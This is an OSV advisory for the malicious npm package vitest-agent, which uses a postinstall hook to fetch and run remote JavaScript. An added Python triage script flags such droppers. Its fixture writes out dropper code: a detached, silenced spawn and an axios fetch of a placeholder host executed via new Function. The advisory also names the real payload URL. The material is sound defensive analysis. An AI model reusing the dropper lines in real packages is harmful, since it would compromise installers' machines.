vitest-agent @1.0.6

Vulnerability report · Last retrieved from osv.dev July 1, 2026 at 10:05 PM UTC

Malicious

OSV ID

MAL-2026-6710

Ecosystem

npm

Summary

The package's postinstall script (node lib/utils/index.js) spawns a detached, stdio-suppressed Node child process that runs lib/utils/smtp-connection/index.js. That file fetches JavaScript from https://jsonkeeper.com/b/WDH3V via axios and executes the response with new Function("require", r.data.cookie)(require), running unpinned, mutable, non-publisher code on the installer's machine at npm install time. The package is named vitest-agent, but its main and shipped source are a verbatim copy of nodemailer (author field Andris Reinman; description is an unrelated React copyright string), a name/identity mismatch consistent with a lure targeting vitest ecosystem users. Concealment signals reinforce the dropper: a ~256 KB LICENSE file sits adjacent to a 185-byte dropper index.js under lib/utils/smtp-connection/, and path names mirror the legitimate nodemailer layout as cover. Because the harmful code path fires automatically from the postinstall lifecycle hook, installers are compromised without any explicit user action beyond installing the package.

Source: amazon-inspector (6e0165cbb3d6ed37a96889c4b016463706346e1c09413635c31ea1ceedde8774)
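Added example (not part of the OSV record or of the package): a Python static-triage routine that flags the dropper indicators the summary describes, run against a constructed fixture mirroring the described layout. The fixture contents, the placeholder URL and the size thresholds are assumptions, not the real package.

```python
"""Static triage for the npm install-time dropper pattern described in the report.
Each heuristic is evidence, not proof: install lifecycle hooks, a detached child with
stdio suppressed, remote fetch combined with dynamic code execution, and a tiny
script beside a very large non-code file in the same directory.
"""
import json
import posixpath
import re
from collections import defaultdict
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
REMOTE_FETCH = re.compile(r"\b(axios\.(get|post)|fetch|https?\.(get|request))\s*\(\s*['\"]https?://")
DYNAMIC_EXEC = re.compile(r"new\s+Function\s*\(|\beval\s*\(|vm\.runIn\w*Context\s*\(")
DETACHED_SPAWN = re.compile(r"detached\s*:\s*true")
STDIO_IGNORE = re.compile(r"stdio\s*:\s*['\"]ignore['\"]")

def triage(pkg_json: str, files: Dict[str, str]) -> List[str]:
    """Return human-readable findings for a package.json string and a path->source map."""
    findings: List[str] = []
    scripts = json.loads(pkg_json).get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook in scripts:  # runs on `npm install` with no further user action
            findings.append(f"install lifecycle hook '{hook}': {scripts[hook]}")
    by_dir: Dict[str, List] = defaultdict(list)
    for path, src in files.items():
        by_dir[posixpath.dirname(path)].append((path, len(src.encode())))
        if DETACHED_SPAWN.search(src) and STDIO_IGNORE.search(src):
            findings.append(f"{path}: spawns detached child with stdio suppressed")
        if REMOTE_FETCH.search(src) and DYNAMIC_EXEC.search(src):
            findings.append(f"{path}: fetches remote content and executes it dynamically")
    for d, entries in by_dir.items():
        small = [p for p, n in entries if p.endswith(".js") and n < 512]
        big = [p for p, n in entries if not p.endswith(".js") and n > 100_000]
        if small and big:  # concealment: minuscule dropper next to a huge filler file
            findings.append(f"{d}: tiny script {small} beside large non-code file {big}")
    return findings

# Constructed fixture mirroring the layout the report describes (assumed, not the real package).
SAMPLE_PACKAGE_JSON = json.dumps({"name": "vitest-agent", "version": "1.0.6",
                                  "scripts": {"postinstall": "node lib/utils/index.js"}})
SAMPLE_FILES = {
    "lib/utils/index.js": "const {spawn}=require('child_process');\n"
        "spawn(process.execPath,['lib/utils/smtp-connection/index.js'],{detached:true,stdio:'ignore'}).unref();",
    "lib/utils/smtp-connection/index.js": "const axios=require('axios');\n"
        "axios.get('https://placeholder.invalid/x').then(r=>new Function('require',r.data.cookie)(require));",
    "lib/utils/smtp-connection/LICENSE": "MIT License\n" + "x" * 262_144,  # ~256 KB filler
    "lib/mailer.js": "module.exports = { createTransport() {} };",
}

if __name__ == "__main__":
    for line in triage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(line)
```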
